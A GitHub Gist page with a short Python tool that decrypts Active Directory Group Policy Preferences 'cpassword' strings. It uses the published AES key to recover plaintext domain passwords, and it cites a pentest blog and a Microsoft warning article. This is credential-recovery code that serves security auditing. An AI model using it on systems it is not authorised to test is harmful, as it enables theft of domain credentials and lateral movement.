Created
November 7, 2018 15:09
-
-
Save edeca/ba2404850c748f48f6511e63f8958fef to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| from base64 import b64decode | |
| from binascii import unhexlify | |
| from Crypto.Cipher import AES | |
| ######## | |
| # Author: David Cannings | |
| # Date: 7th November 2018 | |
| # | |
| # Quick and dirty cpassword decryption tool, ported to Python from the | |
| # Ruby version in this blogpost: https://pentestlab.blog/tag/cpassword/ | |
| # | |
| # See also: https://blogs.technet.microsoft.com/ash/2014/11/10/dont-set-or-save-passwords-using-group-policy-preferences/ | |
| ######## | |
| def main(): | |
| parser = argparse.ArgumentParser(description='Decrypt Active Directory cpassword data') | |
| parser.add_argument('data', type=str, help='cpassword base64 data') | |
| args = parser.parse_args() | |
| key = "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b" | |
| key = unhexlify(key) | |
| cipher = AES.new(key, AES.MODE_CBC, "\x00" * 16) | |
| data = args.data | |
| data += '=' * (-len(data) % 4) | |
| data = b64decode(data) | |
| plaintext = cipher.decrypt(data) | |
| print("Password is: {}".format(plaintext)) | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment